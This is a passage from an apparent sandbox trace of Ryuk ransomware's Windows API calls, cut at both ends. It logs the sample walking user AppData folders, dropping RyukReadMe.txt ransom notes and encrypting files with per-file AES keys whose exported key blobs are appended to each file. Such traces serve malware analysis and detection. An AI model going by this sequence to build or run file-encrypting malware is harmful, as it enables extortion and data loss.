Player\\macromedia.com\\support\\flashplayer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0148.936] GetLastError () returned 0x0 [0148.936] WriteFile (in: hFile=0x1a0, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aa3d0*=0x320, lpOverlapped=0x0) returned 1 [0148.936] CloseHandle (hObject=0x1a0) returned 1 [0148.937] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\*.*", lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0x3a3060 [0148.937] FindNextFileW (in: hFindFile=0x3a3060, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0148.937] FindNextFileW (in: hFindFile=0x3a3060, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 1 [0148.937] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.937] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol", dwFileAttributes=0x80) returned 1 [0148.937] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\settings.sol"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0148.937] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x29a9a18 | out: lpFileSize=0x29a9a18*=470) returned 1 [0148.937] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x29a9a28 | out: lpFileSize=0x29a9a28*=470) returned 1 [0148.937] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xb4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.938] ReadFile (in: hFile=0x1a4, lpBuffer=0x29a9a78, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29a9a38, lpOverlapped=0x0 | out: lpBuffer=0x29a9a78*, lpNumberOfBytesRead=0x29a9a38*=0x19, lpOverlapped=0x0) returned 1 [0148.938] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.938] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29a9a00 | out: phKey=0x29a9a00*=0x3b8690) returned 1 [0148.938] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.939] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.939] ReadFile (in: hFile=0x1a4, lpBuffer=0x2760000, nNumberOfBytesToRead=0x1d6, lpNumberOfBytesRead=0x29a9a10, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29a9a10*=0x1d6, lpOverlapped=0x0) returned 1 [0148.939] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29a9a0c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29a9a0c*=0xf4250) returned 1 [0148.939] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29a9a08*=0x1d6, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29a9a08*=0x1e0) returned 1 [0148.939] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.939] WriteFile (in: hFile=0x1a4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x29a9a10, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29a9a10*=0x1e0, lpOverlapped=0x0) returned 1 [0148.939] WriteFile (in: hFile=0x1a4, lpBuffer=0x29a9a50*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29a9a14, lpOverlapped=0x0 | out: lpBuffer=0x29a9a50*, lpNumberOfBytesWritten=0x29a9a14*=0x6, lpOverlapped=0x0) returned 1 [0148.939] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29a9a20 | out: pbData=0x0*, pdwDataLen=0x29a9a20*=0x10c) returned 1 [0148.939] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29a9aa0, pdwDataLen=0x29a9a20 | out: pbData=0x29a9aa0*, pdwDataLen=0x29a9a20*=0x10c) returned 1 [0148.939] WriteFile (in: hFile=0x1a4, lpBuffer=0x29a9aa0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29a9a14, lpOverlapped=0x0 | out: lpBuffer=0x29a9aa0*, lpNumberOfBytesWritten=0x29a9a14*=0x10c, lpOverlapped=0x0) returned 1 [0148.939] CloseHandle (hObject=0x1a4) returned 1 [0148.967] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.971] CryptDestroyKey (hKey=0x3b8690) returned 1 [0148.971] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0148.971] FindNextFileW (in: hFindFile=0x3a3060, lpFindFileData=0x29a9c70 | out: lpFindFileData=0x29a9c70) returned 0 [0148.971] FindClose (in: hFindFile=0x3a3060 | out: hFindFile=0x3a3060) returned 1 [0148.971] SetLastError (dwErrCode=0x0) [0148.971] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0148.972] GetLastError () returned 0x0 [0148.972] WriteFile (in: hFile=0x1a0, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aa3d0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aa3d0*=0x320, lpOverlapped=0x0) returned 1 [0148.972] CloseHandle (hObject=0x1a0) returned 1 [0148.973] FindNextFileW (in: hFindFile=0x3a3000, lpFindFileData=0x29aa420 | out: lpFindFileData=0x29aa420) returned 0 [0148.973] FindClose (in: hFindFile=0x3a3000 | out: hFindFile=0x3a3000) returned 1 [0148.973] SetLastError (dwErrCode=0x0) [0148.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.973] GetLastError () returned 0xb7 [0148.973] CloseHandle (hObject=0x19c) returned 1 [0148.973] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0 [0148.973] FindClose (in: hFindFile=0x3a2fa0 | out: hFindFile=0x3a2fa0) returned 1 [0148.973] SetLastError (dwErrCode=0x0) [0148.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.973] GetLastError () returned 0xb7 [0148.973] CloseHandle (hObject=0x198) returned 1 [0148.973] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0 [0148.973] FindClose (in: hFindFile=0x3a2f40 | out: hFindFile=0x3a2f40) returned 1 [0148.973] SetLastError (dwErrCode=0x0) [0148.973] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.974] GetLastError () returned 0xb7 [0148.974] CloseHandle (hObject=0x194) returned 1 [0148.974] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.974] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.974] SetLastError (dwErrCode=0x0) [0148.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\Flash Player\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\flash player\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.974] GetLastError () returned 0xb7 [0148.974] CloseHandle (hObject=0x190) returned 1 [0148.974] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0148.974] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0148.974] SetLastError (dwErrCode=0x0) [0148.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Macromedia\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\macromedia\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.974] GetLastError () returned 0xb7 [0148.974] CloseHandle (hObject=0x18c) returned 1 [0148.974] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0148.974] SetLastError (dwErrCode=0x0) [0148.974] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0148.974] GetLastError () returned 0xb7 [0148.974] CloseHandle (hObject=0x18c) returned 1 [0148.974] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0148.975] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.975] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.975] SetLastError (dwErrCode=0x0) [0148.975] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.975] GetLastError () returned 0x0 [0148.975] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.976] CloseHandle (hObject=0x190) returned 1 [0148.976] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.977] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.977] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.977] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.977] SetLastError (dwErrCode=0x0) [0148.977] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\AddIns\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\addins\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.977] GetLastError () returned 0x0 [0148.977] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.978] CloseHandle (hObject=0x190) returned 1 [0148.978] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.978] SetLastError (dwErrCode=0x0) [0148.978] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.978] GetLastError () returned 0xb7 [0148.978] CloseHandle (hObject=0x190) returned 1 [0148.978] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.979] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.979] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0 [0148.979] FindClose (in: hFindFile=0x3a2ee0 | out: hFindFile=0x3a2ee0) returned 1 [0148.979] SetLastError (dwErrCode=0x0) [0148.979] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Credentials\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\credentials\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.979] GetLastError () returned 0x0 [0148.979] WriteFile (in: hFile=0x190, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ac290, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ac290*=0x320, lpOverlapped=0x0) returned 1 [0148.981] CloseHandle (hObject=0x190) returned 1 [0148.981] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0148.981] SetLastError (dwErrCode=0x0) [0148.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0148.981] GetLastError () returned 0xb7 [0148.981] CloseHandle (hObject=0x190) returned 1 [0148.981] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\*.*", lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 0x3a2ee0 [0148.981] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.981] FindNextFileW (in: hFindFile=0x3a2ee0, lpFindFileData=0x29abb30 | out: lpFindFileData=0x29abb30) returned 1 [0148.981] SetLastError (dwErrCode=0x0) [0148.981] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x194 [0148.982] GetLastError () returned 0x0 [0148.982] WriteFile (in: hFile=0x194, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29abae0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29abae0*=0x320, lpOverlapped=0x0) returned 1 [0148.982] CloseHandle (hObject=0x194) returned 1 [0148.982] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*.*", lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 0x3a2f40 [0148.982] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.983] FindNextFileW (in: hFindFile=0x3a2f40, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0148.983] SetLastError (dwErrCode=0x0) [0148.983] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x198 [0148.983] GetLastError () returned 0x0 [0148.983] WriteFile (in: hFile=0x198, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ab330*=0x320, lpOverlapped=0x0) returned 1 [0148.984] CloseHandle (hObject=0x198) returned 1 [0148.984] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3a2fa0 [0148.985] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.985] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0148.985] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0148.985] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", dwFileAttributes=0x80) returned 1 [0148.986] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\83aa4cc77f591dfc2374580bbd95f6ba_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0148.986] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=45) returned 1 [0148.986] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=45) returned 1 [0148.986] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0148.986] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0148.986] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.986] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x2d, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x2d, lpOverlapped=0x0) returned 1 [0148.987] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0148.987] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x2d, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29aa968*=0x30) returned 1 [0148.987] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0148.987] WriteFile (in: hFile=0x19c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29aa970*=0x30, lpOverlapped=0x0) returned 1 [0148.987] WriteFile (in: hFile=0x19c, lpBuffer=0x29aa9b0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aa9b0*, lpNumberOfBytesWritten=0x29aa974*=0x6, lpOverlapped=0x0) returned 1 [0148.987] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29aa980 | out: pbData=0x0*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0148.987] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29aaa00, pdwDataLen=0x29aa980 | out: pbData=0x29aaa00*, pdwDataLen=0x29aa980*=0x10c) returned 1 [0148.987] WriteFile (in: hFile=0x19c, lpBuffer=0x29aaa00*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29aa974, lpOverlapped=0x0 | out: lpBuffer=0x29aaa00*, lpNumberOfBytesWritten=0x29aa974*=0x10c, lpOverlapped=0x0) returned 1 [0148.987] CloseHandle (hObject=0x19c) returned 1 [0149.004] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.007] CryptDestroyKey (hKey=0x3b8690) returned 1 [0149.007] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0149.008] FindNextFileW (in: hFindFile=0x3a2fa0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0149.008] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0149.008] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f", dwFileAttributes=0x80) returned 1 [0149.009] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\932a2db58c237abd381d22df4c63a04a_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0149.009] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa978 | out: lpFileSize=0x29aa978*=87) returned 1 [0149.009] GetFileSizeEx (in: hFile=0x19c, lpFileSize=0x29aa988 | out: lpFileSize=0x29aa988*=87) returned 1 [0149.009] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29aa960 | out: phKey=0x29aa960*=0x3b8690) returned 1 [0149.009] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0149.009] SetFilePointer (in: hFile=0x19c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0149.009] ReadFile (in: hFile=0x19c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x57, lpNumberOfBytesRead=0x29aa970, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29aa970*=0x57, lpOverlapped=0x0) returned 1 [0149.010] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29aa96c*=0xf4250) returned 1 [0149.010] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29aa968*=0x57, 